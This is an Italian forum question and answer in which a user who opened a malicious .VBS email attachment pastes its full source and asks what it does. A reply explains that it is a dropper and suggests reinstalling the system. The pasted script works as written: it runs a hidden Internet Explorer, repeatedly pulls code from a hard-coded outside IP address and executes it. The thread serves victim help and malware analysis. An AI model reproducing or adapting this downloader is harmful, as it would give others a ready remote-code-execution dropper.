Ricevo una e-mail con il file virus * .VBS [chiuso]

0

Ho involontariamente aperto il file. Ero sicuro che Windows mi chiedesse se sono sicuro di eseguire questo script, ma sfortunatamente non lo era. Ora mi sto chiedendo cosa sta facendo esattamente quel file. Qualcuno può aiutarti?

contenuto del file:

' fffff
' ssssss

Dim DSLOVIEI
Dim foxtomnum, ubigs
ubigs = 0
foxtomnum = "1118812"

Call SookCanalTV(2 + 2)

Function TroceSHello(kpserial)
   On Error Resume Next
    DSLOVIEI.Quit()
    Execute "" + kpserial + "" 
End Function

Function DSLOVIEIChek(stcurl)
 Set DSLOVIEI = CreateObject("InternetExplorer.Application")
 DSLOVIEI.Visible = 0
 DSLOVIEI.navigate stcurl

 While DSLOVIEI.ReadyState <> 4 : WScript.Sleep 110 : Wend

 DSLOVIEIChek  = DSLOVIEI.document.body.innerText
End Function

Sub SookCanalTV(one)
  On Error Resume Next
    While ubigs < one
        WScript.Sleep 10 + 3    
      Call onlineZolo()
        WScript.Sleep 11000
   Wend
End Sub

Function onlineZolo()
    Dim promazzzzz
    foxtomnum = CStr(foxtomnum + 1) 
    promazzzzz = DSLOVIEIChek("http://192.3.45.90/online.php?mdms=143760135&to=" + foxtomnum)
TroceSHello(promazzzzz)
End Function
    
posta JBudny 01.12.2018 - 10:30
fonte

1 risposta

2

Sfortunatamente, quello script VBS sembra essere un dropper che ha installato malware sul tuo computer. L'opzione migliore è reinstalla il tuo sistema operativo e avvia nuovo.

Lo script è stato caricato su VirusTotal di recente con indicazioni di malware e analisi-ibrida ha ulteriori dettagli sul malware dopo l'analisi.

Il malware in pratica fa quanto segue:

  1. Crea un processo di Internet Explorer in background
  2. Passa a http://192.3.45.90/online.php?mdms=71464&to=1118813 più volte, aumentando il valore del parametro to ogni volta per effettuare richieste GET diverse e scaricare codice VBS diverso
  3. Esegue il codice VBS scaricato, installando il malware
risposta data 01.12.2018 - 11:19
fonte

Leggi altre domande sui tag